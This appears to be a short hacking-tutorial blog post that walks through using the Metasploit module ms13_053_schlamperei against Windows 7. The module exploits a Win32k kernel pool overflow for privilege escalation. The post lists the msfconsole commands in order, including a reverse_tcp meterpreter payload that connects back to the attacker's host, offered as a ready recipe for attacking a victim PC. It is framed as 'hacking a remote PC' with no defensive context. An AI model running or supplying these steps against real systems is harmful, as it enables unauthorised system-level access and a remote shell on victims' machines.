Hack Remote Windows PC using Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)

This module leverages a kernel pool overflow in Win32k which allows local privilege escalation. The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process). This allows any unprivileged process to freely migrate to winlogon.exe, achieving privilege escalation. This exploit was used in pwn2own 2013 by MWR to break out of chrome's sandbox. NOTE: when a meterpreter session started by this exploit exits, winlogin.exe is likely to crash.

Exploit Targets
Windows 7

Requirement
Attacker: kali Linux
Victim PC: Windows 7

Open Kali terminal type msfconsole


Now type use exploit/windows/local/ms13_053_schlamperei
msf exploit (ms13_053_schlamperei)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms13_053_schlamperei)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (ms13_053_schlamperei)>set session 2
msf exploit (ms13_053_schlamperei)>exploit

0 comments:

Post a Comment